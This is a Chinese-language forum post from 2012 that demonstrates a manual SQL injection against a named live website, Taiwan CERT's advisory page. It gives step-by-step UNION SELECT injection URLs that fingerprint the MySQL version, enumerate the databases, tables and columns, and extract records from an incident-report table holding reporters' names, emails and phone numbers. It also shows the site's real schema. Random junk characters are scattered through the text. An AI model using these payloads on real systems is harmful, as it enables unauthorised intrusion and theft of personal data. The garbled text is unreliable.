1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询# L- n# y+ W5 T8 h8 Y6 F4 u# L8 ^
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
- \6 E9 |9 [3 H9 X: w& Y$ c5 ~6 Qhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
4 E( ?3 }; `0 x$ M3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--7 z4 n/ ]0 C9 C7 l/ G( t- O1 e; C
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。1 m. q) s; k; F# C4 [4 g5 t6 j
4.判断有没有写权限* N, |( A& S7 G' p" i& \
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限1 r' I) ^* K: C+ V2 {- c4 R, ?
没办法,手动猜表啦0 U& c2 L: K# @- S0 b
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1' O% j; @* A5 E p
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
# R$ {3 ~0 j* [: j& Shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
1 c5 ?0 ^; a' I6 o7 S0 [. e" k, E- ^5 o成功查出所有数据库,国外的黑客就是不一般。数据库如下:9 h3 i) M8 Z' }% X( Y* J: a6 @
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
3 g% K' U0 w/ g$ H( [0 _6.爆表,爆的是twcert库
( w. e' V) l5 {$ ]1 ~. qhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
$ Z/ ^/ z+ v5 E1 \爆出如下表
1 Y4 R/ B$ Y! g2 E% }downloadfile,irsys,newsdata,secrpt,secrpt_big5) `5 Q) T/ J# Q% e; [
7.爆列名,这次爆的是irsys表- ]& W. V& I/ E# }% N# d; M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
" m8 v" W+ O, z3 I: J9 t! q爆出如下列
9 Y+ {7 G5 x* n' n- r& D! mir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
2 Y0 f V# `' ~8 c2 a" k! g8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
- v3 q/ i* k+ m& ?. l! h! rhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--7 h4 c8 ~& {, N4 _3 @1 z
返回是3,说明每个列里有3个地段) c# m' a; K& W/ b
9.爆字段内容- C6 P& q. E; q/ \+ e( { r N
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--/ F8 W" v% p) l! ]/ ~8 ?
爆出name列的第一个字段的内容
1 l: m( ]% |5 M# }. \4 z7 qhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--+ `; O1 s( V- {) N1 _! z
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对